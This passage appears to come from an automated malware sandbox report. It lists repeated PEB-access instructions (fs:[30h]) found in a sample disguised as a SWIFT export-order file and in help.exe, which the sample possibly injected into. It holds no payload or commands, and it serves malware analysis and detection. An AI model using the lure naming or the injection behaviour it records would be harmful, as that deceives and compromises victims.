          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01446C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01446C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01446C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01446C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01447016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01447016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01447016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013E746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01494015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01494015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013FF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0145B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0145B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0145B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0145B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0145B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0145B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01498CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_014814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01446CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01446CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01446CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01443884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01443884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_014090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013FE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01498B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01498F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0149070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0149070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0148131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0145FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0145FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013DFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013DEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013FB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_014037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0148138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0147D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01447794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01447794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01447794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01495BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01454257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013E3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0147B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0147B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01498A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0140927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0147FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0147FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01408EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013FFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01498ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0145FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013F16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_014446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01490EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01490EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01490EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013F36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F92AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F92ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03038B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0301D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03035BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FF4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F83A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F65210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F78A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F8DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0302EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0301B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_0301B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03038A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F92397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F71B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F71B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F93B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F93B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FFB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FA90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F69080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_030249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_030249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_030249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_030249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F80050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F80050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F9002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F7B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03034015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_03034015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FF41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02F6B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 20_2_02FE69A6 mov eax, dword ptr fs:[00000030h]
